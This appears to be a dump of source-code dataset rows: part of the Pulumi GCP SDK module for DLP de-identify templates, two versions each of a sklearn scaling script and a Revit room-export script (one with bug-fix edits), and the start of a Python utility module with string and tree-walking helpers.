primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigArgs(
new_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueArgs(
integer_value=9,
),
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="EMAIL_ADDRESS",
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="LAST_NAME",
),
],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
character_mask_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCharacterMaskConfigArgs(
characters_to_ignore=[{
"commonCharactersToIgnore": "PUNCTUATION",
}],
masking_character="X",
number_to_mask=4,
reverse_order=True,
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="DATE_OF_BIRTH",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigArgs(
new_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueArgs(
date_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueDateValueArgs(
day=1,
month=1,
year=2020,
),
),
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="CREDIT_CARD_NUMBER",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
crypto_deterministic_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigArgs(
context=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigContextArgs(
name="sometweak",
),
crypto_key=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigCryptoKeyArgs(
transient=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigCryptoKeyTransientArgs(
name="beep",
),
),
surrogate_info_type=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigSurrogateInfoTypeArgs(
name="abc",
),
),
),
),
],
),
),
description="Description",
display_name="Displayname",
parent="projects/my-project-name")
```
## Import
DeidentifyTemplate can be imported using any of these accepted formats
```sh
$ pulumi import gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate default {{parent}}/deidentifyTemplates/{{name}}
```
```sh
$ pulumi import gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate default {{parent}}/{{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']] deidentify_config: Configuration of the deidentify template
Structure is documented below.
:param pulumi.Input[str] description: A description of the template.
:param pulumi.Input[str] display_name: User set display name of the template.
:param pulumi.Input[str] parent: The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PreventionDeidentifyTemplateArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Allows creation of templates to de-identify content.
To get more information about DeidentifyTemplate, see:
* [API documentation](https://cloud.google.com/dlp/docs/reference/rest/v2/projects.deidentifyTemplates)
* How-to Guides
* [Official Documentation](https://cloud.google.com/dlp/docs/concepts-templates)
## Example Usage
### Dlp Deidentify Template Basic
```python
import pulumi
import pulumi_gcp as gcp
basic = gcp.dataloss.PreventionDeidentifyTemplate("basic",
deidentify_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigArgs(
info_type_transformations=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsArgs(
transformations=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="FIRST_NAME",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_with_info_type_config=True,
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="PHONE_NUMBER",
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="AGE",
),
],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigArgs(
new_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueArgs(
integer_value=9,
),
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="EMAIL_ADDRESS",
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="LAST_NAME",
),
],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
character_mask_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCharacterMaskConfigArgs(
characters_to_ignore=[{
"commonCharactersToIgnore": "PUNCTUATION",
}],
masking_character="X",
number_to_mask=4,
reverse_order=True,
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="DATE_OF_BIRTH",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigArgs(
new_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueArgs(
date_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueDateValueArgs(
day=1,
month=1,
year=2020,
),
),
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="CREDIT_CARD_NUMBER",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
crypto_deterministic_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigArgs(
context=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigContextArgs(
name="sometweak",
),
crypto_key=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigCryptoKeyArgs(
transient=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigCryptoKeyTransientArgs(
name="beep",
),
),
surrogate_info_type=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigSurrogateInfoTypeArgs(
name="abc",
),
),
),
),
],
),
),
description="Description",
display_name="Displayname",
parent="projects/my-project-name")
```
## Import
DeidentifyTemplate can be imported using any of these accepted formats
```sh
$ pulumi import gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate default {{parent}}/deidentifyTemplates/{{name}}
```
```sh
$ pulumi import gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate default {{parent}}/{{name}}
```
:param str resource_name: The name of the resource.
:param PreventionDeidentifyTemplateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PreventionDeidentifyTemplateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deidentify_config: Optional[pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PreventionDeidentifyTemplateArgs.__new__(PreventionDeidentifyTemplateArgs)
if deidentify_config is None and not opts.urn:
raise TypeError("Missing required property 'deidentify_config'")
__props__.__dict__["deidentify_config"] = deidentify_config
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
if parent is None and not opts.urn:
raise TypeError("Missing required property 'parent'")
__props__.__dict__["parent"] = parent
__props__.__dict__["name"] = None
super(PreventionDeidentifyTemplate, __self__).__init__(
'gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
deidentify_config: Optional[pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None) -> 'PreventionDeidentifyTemplate':
"""
Get an existing PreventionDeidentifyTemplate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']] deidentify_config: Configuration of the deidentify template
Structure is documented below.
:param pulumi.Input[str] description: A description of the template.
:param pulumi.Input[str] display_name: User set display name of the template.
:param pulumi.Input[str] name: Name of the information type. Either a name of your choosing when creating a CustomInfoType, or one of the names listed at [https://cloud.google.com/dlp/docs/infotypes-reference](https://cloud.google.com/dlp/docs/infotypes-reference) when specifying a built-in type. When sending Cloud DLP results to Data Catalog, infoType names should conform to the pattern `[A-Za-z0-9$-_]{1,64}`.
:param pulumi.Input[str] parent: The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PreventionDeidentifyTemplateState.__new__(_PreventionDeidentifyTemplateState)
__props__.__dict__["deidentify_config"] = deidentify_config
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["name"] = name
__props__.__dict__["parent"] = parent
return PreventionDeidentifyTemplate(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="deidentifyConfig")
def deidentify_config(self) -> pulumi.Output['outputs.PreventionDeidentifyTemplateDeidentifyConfig']:
"""
Configuration of the deidentify template
Structure is documented below.
"""
return pulumi.get(self, "deidentify_config")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description of the template.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[str]]:
"""
User set display name of the template.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the information type. Either a name of your choosing when creating a CustomInfoType, or one of the names listed at [https://cloud.google.com/dlp/docs/infotypes-reference](https://cloud.google.com/dlp/docs/infotypes-reference) when specifying a built-in type. When sending Cloud DLP results to Data Catalog, infoType names should conform to the pattern `[A-Za-z0-9$-_]{1,64}`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parent(self) -> pulumi.Output[str]:
"""
The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
"""
return pulumi.get(self, "parent")
| 3,046 | 30,037 | 67 |
8507de2c30bd2745a0276ae3c30b8e452c32e14f | 486 | py | Python | processing/MinMaxScaler.py | lkhphuc/slack-visual-summary | 59c88580d95222718dd5c260eb1eacd01e3eeb35 | [
"MIT"
] | 2 | 2018-08-14T09:11:33.000Z | 2019-09-17T18:25:26.000Z | processing/MinMaxScaler.py | lkhphuc/slack-visual-summary | 59c88580d95222718dd5c260eb1eacd01e3eeb35 | [
"MIT"
] | null | null | null | processing/MinMaxScaler.py | lkhphuc/slack-visual-summary | 59c88580d95222718dd5c260eb1eacd01e3eeb35 | [
"MIT"
] | null | null | null | from sklearn.preprocessing import MinMaxScaler
from numpy import loadtxt
import numpy as np
import matplotlib as plt
import pandas as pd
from numpy import reshape
# Load the whitespace-separated time samples (expects data-time.txt beside the script).
data = loadtxt('data-time.txt')
print(data)
#redata = np.reshape(-1,1)
#print(redata)
# BUG FIX: the original built a second, configured scaler and threw it away
# (`MinMaxScaler(copy=True, feature_range=(0, 100))` stood alone with no effect),
# so the data was silently scaled to the default 0..1 range. Configure the scaler
# that is actually fitted and used instead.
scaler = MinMaxScaler(copy=True, feature_range=(0, 100))
print(scaler.fit(data))
print(scaler.data_max_)
a = scaler.transform(data)
# Persist the scaled values with six decimal places, then echo them.
np.savetxt('time-scale.txt', a,fmt='%.6f')
print(a)
#print(scaler.transform([[2, 2]]))
| 23.142857 | 47 | 0.751029 | from sklearn.preprocessing import MinMaxScaler
from numpy import loadtxt
import numpy as np
import matplotlib as plt
import pandas as pd
from numpy import reshape
# Load the whitespace-separated time samples (expects data-time.txt beside the script).
data = loadtxt('data-time.txt')
print(data)
#redata = np.reshape(-1,1)
#print(redata)
# Fit a default 0..1 min-max scaler on the loaded columns.
scaler = MinMaxScaler()
print(scaler.fit(data))
# NOTE(review): the next line builds a configured scaler and immediately discards
# it, so feature_range=(0, 100) is never applied -- looks like a bug; confirm intent.
MinMaxScaler(copy=True, feature_range=(0, 100))
print(scaler.data_max_)
a = scaler.transform(data)
# Persist the scaled values with six decimal places, then echo them.
np.savetxt('time-scale.txt', a,fmt='%.6f')
print(a)
#print(scaler.transform([[2, 2]]))
| 0 | 0 | 0 |
0fe5f55b94767e2765b101413f36d3b004c94b0e | 3,710 | py | Python | roomInformationExport.py | ruornil/revitDynamoScripts | dc01db653a721136da4e3f99469df4e06becb767 | [
"MIT"
] | null | null | null | roomInformationExport.py | ruornil/revitDynamoScripts | dc01db653a721136da4e3f99469df4e06becb767 | [
"MIT"
] | null | null | null | roomInformationExport.py | ruornil/revitDynamoScripts | dc01db653a721136da4e3f99469df4e06becb767 | [
"MIT"
] | null | null | null | #Copyright(c) 2015, Nathan Miller
# The Proving Ground, http://theprovingground.org
#Edited and modified by Mehmet Cenk Tunaboylu, to better suit his needs. Removed boundary curves extraction. Added department extraction.
# Dynamo/Revit python node: collects every placed room in the model and returns a
# column-oriented table (header string followed by per-room values) through OUT.
import clr
# Import RevitAPI
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
# Import DocumentManager and TransactionManager
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
# Import ToDSType(bool) extension method
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.ImportExtensions(Revit.GeometryConversion)
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
#The input to this node will be stored in the IN[0] variable.
doc = DocumentManager.Instance.CurrentDBDocument
app = DocumentManager.Instance.CurrentUIApplication.Application
toggle = IN[0]
output = []
# Each list starts with its column header; per-room values are appended below.
rooms = ['TYPE']
names = ['ROOM NAME']
numbers = ['ROOM NUMBER']
areas = ['AREA']
levels = ['LEVEL']
locations = ['LOCATION']
elementids = ['ELEMENT ID']
uniqueids = ['UNIQUE ID']
roomStyles = ['ROOM STYLE']
baseFinishes = ['BASE FINISH']
floorFinishes = ['FLOOR FINISH']
wallFinishes = ['WALL FINISH']
ceilingFinishes = ['CEILING FINISH']
if toggle == True:
    collector = FilteredElementCollector(doc)
    collector.OfCategory(BuiltInCategory.OST_Rooms)
    famtypeitr = collector.GetElementIdIterator()
    famtypeitr.Reset()
    for item in famtypeitr:
        elmID = item
        eleminst = doc.GetElement(elmID)
        #print eleminst
        if eleminst.Area > 0:  # skip unplaced/unenclosed rooms (they report zero area)
            room = eleminst
            roomname = ''
            # BUG FIX: reset the per-room parameter values each iteration. The
            # original left them unassigned, so a room missing one of these
            # parameters either raised NameError (first room) or silently
            # inherited the previous room's value.
            level = None
            baseFinish = None
            wallFinish = None
            floorFinish = None
            ceilingFinish = None
            roomStyle = None
            for p in room.Parameters:
                if p.Definition.Name == 'Name':
                    roomname = p.AsString()
                if p.Definition.Name == 'Level':
                    level = p.AsValueString()
                    if (level is None):
                        level = p.AsString()
                if p.Definition.Name == 'Base Finish':
                    baseFinish = p.AsValueString()
                    if (baseFinish is None):
                        baseFinish = p.AsString()
                if p.Definition.Name == 'Wall Finish':
                    wallFinish = p.AsValueString()
                    if (wallFinish is None):
                        wallFinish = p.AsString()
                if p.Definition.Name == 'Floor Finish':
                    floorFinish = p.AsValueString()
                    if (floorFinish is None):
                        floorFinish = p.AsString()
                if p.Definition.Name == 'Ceiling Finish':
                    ceilingFinish = p.AsValueString()
                    if (ceilingFinish is None):
                        ceilingFinish = p.AsString()
                if p.Definition.Name == 'Room Style':
                    roomStyle = p.AsValueString()
                    if (roomStyle is None):
                        roomStyle = p.AsString()
            number = eleminst.Number
            area = eleminst.Area
            location = eleminst.Location.Point.ToPoint()
            elementid = eleminst.Id.ToString()
            uniqueid = eleminst.UniqueId
            uniqueids.append(uniqueid)
            rooms.append(room)
            numbers.append("xxx_"+number)
            names.append(roomname)
            areas.append(area)
            levels.append(level)
            roomStyles.append(roomStyle)
            baseFinishes.append(baseFinish)
            floorFinishes.append(floorFinish)
            wallFinishes.append(wallFinish)
            ceilingFinishes.append(ceilingFinish)
            locations.append(location)
# NOTE(review): elementid is computed but never appended, and the elementids
# column is never added to output -- confirm whether that is intentional.
output.append(uniqueids)
output.append(rooms)
output.append(numbers)
output.append(names)
output.append(areas)
output.append(levels)
output.append(roomStyles)
output.append(baseFinishes)
output.append(floorFinishes)
output.append(wallFinishes)
output.append(ceilingFinishes)
output.append(locations)
#Assign your output to the OUT variable
OUT = output | 28.538462 | 138 | 0.695957 | #Copyright(c) 2015, Nathan Miller
# The Proving Ground, http://theprovingground.org
#Edited and modified by Mehmet Cenk Tunaboylu, to better suit his needs. Removed boundary curves extraction. Added department extraction.
# Dynamo/Revit python node: collects every placed room in the model and returns a
# column-oriented table (header string followed by per-room values) through OUT.
import clr
# Import RevitAPI
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
# Import DocumentManager and TransactionManager
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
# Import ToDSType(bool) extension method
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.ImportExtensions(Revit.GeometryConversion)
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
#The input to this node will be stored in the IN[0] variable.
doc = DocumentManager.Instance.CurrentDBDocument
app = DocumentManager.Instance.CurrentUIApplication.Application
toggle = IN[0]
output = []
# Each list starts with its column header; per-room values are appended below.
rooms = ['TYPE']
names = ['ROOM NAME']
numbers = ['ROOM NUMBER']
areas = ['AREA']
levels = ['LEVEL']
locations = ['LOCATION']
elementids = ['ELEMENT ID']
uniqueids = ['UNIQUE ID']
roomStyles = ['ROOM STYLE']
baseFinishes = ['BASE FINISH']
floorFinishes = ['FLOOR FINISH']
wallFinishes = ['WALL FINISH']
ceilingFinishes = ['CEILING FINISH']
if toggle == True:
    collector = FilteredElementCollector(doc)
    collector.OfCategory(BuiltInCategory.OST_Rooms)
    famtypeitr = collector.GetElementIdIterator()
    famtypeitr.Reset()
    for item in famtypeitr:
        elmID = item
        eleminst = doc.GetElement(elmID)
        #print eleminst
        if eleminst.Area > 0:
            room = eleminst
            roomname = ''
            # NOTE(review): level/baseFinish/wallFinish/floorFinish/ceilingFinish/roomStyle
            # are only assigned when the matching parameter exists; a room missing one
            # inherits the previous room's value (or raises NameError on the very first
            # room) -- likely needs a per-room reset; confirm.
            for p in room.Parameters:
                if p.Definition.Name == 'Name':
                    roomname = p.AsString()
                if p.Definition.Name == 'Level':
                    level = p.AsValueString()
                    if (level is None):
                        level = p.AsString()
                if p.Definition.Name == 'Base Finish':
                    baseFinish = p.AsValueString()
                    if (baseFinish is None):
                        baseFinish = p.AsString()
                if p.Definition.Name == 'Wall Finish':
                    wallFinish = p.AsValueString()
                    if (wallFinish is None):
                        wallFinish = p.AsString()
                if p.Definition.Name == 'Floor Finish':
                    floorFinish = p.AsValueString()
                    if (floorFinish is None):
                        floorFinish = p.AsString()
                if p.Definition.Name == 'Ceiling Finish':
                    ceilingFinish = p.AsValueString()
                    if (ceilingFinish is None):
                        ceilingFinish = p.AsString()
                if p.Definition.Name == 'Room Style':
                    roomStyle = p.AsValueString()
                    if (roomStyle is None):
                        roomStyle = p.AsString()
            number = eleminst.Number
            area = eleminst.Area
            location = eleminst.Location.Point.ToPoint()
            elementid = eleminst.Id.ToString()
            uniqueid = eleminst.UniqueId
            uniqueids.append(uniqueid)
            rooms.append(room)
            numbers.append("xxx_"+number)
            names.append(roomname)
            areas.append(area)
            levels.append(level)
            roomStyles.append(roomStyle)
            baseFinishes.append(baseFinish)
            floorFinishes.append(floorFinish)
            wallFinishes.append(wallFinish)
            ceilingFinishes.append(ceilingFinish)
            locations.append(location)
# NOTE(review): elementid is computed but never appended, and the elementids
# column is never added to output -- confirm whether that is intentional.
output.append(uniqueids)
output.append(rooms)
output.append(numbers)
output.append(names)
output.append(areas)
output.append(levels)
output.append(roomStyles)
output.append(baseFinishes)
output.append(floorFinishes)
output.append(wallFinishes)
output.append(ceilingFinishes)
output.append(locations)
#Assign your output to the OUT variable
OUT = output | 0 | 0 | 0 |
4da836cc685f5c603b5df612aa13b9c3f035b149 | 14,627 | py | Python | util.py | yinkaisheng/AgoraRteDemo | 512769e299ac19601589b0c4c154e012aea27ffb | [
"Apache-2.0"
] | 1 | 2022-03-03T14:40:53.000Z | 2022-03-03T14:40:53.000Z | util.py | yinkaisheng/AgoraRteDemo | 512769e299ac19601589b0c4c154e012aea27ffb | [
"Apache-2.0"
] | null | null | null | util.py | yinkaisheng/AgoraRteDemo | 512769e299ac19601589b0c4c154e012aea27ffb | [
"Apache-2.0"
] | null | null | null | #!python3
# -*- coding: utf-8 -*-
# author: yinkaisheng@foxmail.com
import os
import sys
import json
import ctypes
import pickle
import shutil
# import socket
import zipfile
import datetime
from typing import Any, Callable, Iterator, Dict, List, Tuple
_SelfFileName = os.path.split(__file__)[1]
def getStrBetween(src: str, left: str, right: str = None, start: int = 0, end: int = None) -> Tuple[str, int]:
    '''
    Return (substring, index); index is -1 when a required marker is not found.
    The substring lies between the markers left and right in src[start:end].
    A falsy left means "from the beginning"; a falsy right means "to the end".
    '''
    if left:
        s1start = src.find(left, start, end)
        if s1start < 0:
            return '', -1
        s1end = s1start + len(left)
        if not right:
            # No right marker requested: take everything after `left`.
            return src[s1end:], s1end
        s2start = src.find(right, s1end, end)
        if s2start < 0:
            return '', -1
        return src[s1end:s2start], s1end
    if right:
        # BUG FIX: the original called src.find(right, end), passing `end` as the
        # *start* position, so an explicit end was misused as the search origin.
        s2start = src.find(right, start, end)
        if s2start < 0:
            return '', -1
        return src[:s2start], 0
    return '', -1
TreeNode = Any  # loose alias: any object may act as a tree node
def walkTree(root, getChildren: Callable[[TreeNode], List[TreeNode]] = None,
             getFirstChild: Callable[[TreeNode], TreeNode] = None, getNextSibling: Callable[[TreeNode], TreeNode] = None,
             yieldCondition: Callable[[TreeNode, int], bool] = None, includeRoot: bool = False, maxDepth: int = 0xFFFFFFFF) -> Iterator:
    """
    Walk a tree not using recursive algorithm.
    root: a tree node.
    getChildren: Callable[[TreeNode], List[TreeNode]], function(treeNode: TreeNode) -> List[TreeNode].
    getFirstChild: Callable[[TreeNode], TreeNode], function(treeNode: TreeNode) -> TreeNode.
    getNextSibling: Callable[[TreeNode], TreeNode], function(treeNode: TreeNode) -> TreeNode.
    yieldCondition: Callable[[TreeNode, int], bool], function(treeNode: TreeNode, depth: int) -> bool.
    includeRoot: bool, if True yield root first.
    maxDepth: int, enum depth.
    If getChildren is valid, ignore getFirstChild and getNextSibling,
    yield 3 items tuple: (treeNode, depth, remain children count in current depth).
    If getChildren is not valid, using getFirstChild and getNextSibling,
    yield 2 items tuple: (treeNode, depth).
    If yieldCondition is not None, only yield tree nodes that yieldCondition(treeNode: TreeNode, depth: int)->bool returns True.
    For example:
    def GetDirChildren(dir_):
        if os.path.isdir(dir_):
            return [os.path.join(dir_, it) for it in os.listdir(dir_)]
    for it, depth, leftCount in WalkTree('D:\\', getChildren= GetDirChildren):
        print(it, depth, leftCount)
    """
    if maxDepth <= 0:
        return
    depth = 0
    if getChildren:
        if includeRoot:
            if not yieldCondition or yieldCondition(root, 0):
                yield root, 0, 0
        children = getChildren(root)
        # childList is an explicit stack: childList[d] holds the not-yet-visited
        # nodes at depth d+1; `depth` indexes the top of the stack.
        childList = [children]
        while depth >= 0: # or while childList:
            lastItems = childList[-1]
            if lastItems:
                if not yieldCondition or yieldCondition(lastItems[0], depth + 1):
                    yield lastItems[0], depth + 1, len(lastItems) - 1
                if depth + 1 < maxDepth:
                    children = getChildren(lastItems[0])
                    if children:
                        # descend: push this node's children before finishing its siblings
                        depth += 1
                        childList.append(children)
                del lastItems[0]
            else:
                # current level exhausted: pop it and climb back to the parent level
                del childList[depth]
                depth -= 1
    elif getFirstChild and getNextSibling:
        if includeRoot:
            if not yieldCondition or yieldCondition(root, 0):
                yield root, 0
        child = getFirstChild(root)
        # childList[d] holds the next sibling still to be visited at depth d+1
        childList = [child]
        while depth >= 0: # or while childList:
            lastItem = childList[-1]
            if lastItem:
                if not yieldCondition or yieldCondition(lastItem, depth + 1):
                    yield lastItem, depth + 1
                child = getNextSibling(lastItem)
                childList[depth] = child
                if depth + 1 < maxDepth:
                    child = getFirstChild(lastItem)
                    if child:
                        depth += 1
                        childList.append(child)
            else:
                del childList[depth]
                depth -= 1
def listDir(path: Tuple[str, bool, str]) -> List[Tuple[str, bool, str]]:
    '''List a directory given as (dirPath, isDir, name); returns
    (filePath, isDir, fileName) tuples with subdirectories listed before files,
    or None when the incoming tuple is not flagged as a directory.'''
    if path[1]:
        subDirs = []
        plainFiles = []
        for entryName in os.listdir(path[0]):
            fullPath = os.path.join(path[0], entryName)
            if os.path.isdir(fullPath):
                subDirs.append((fullPath, True, entryName))
            else:
                plainFiles.append((fullPath, False, entryName))
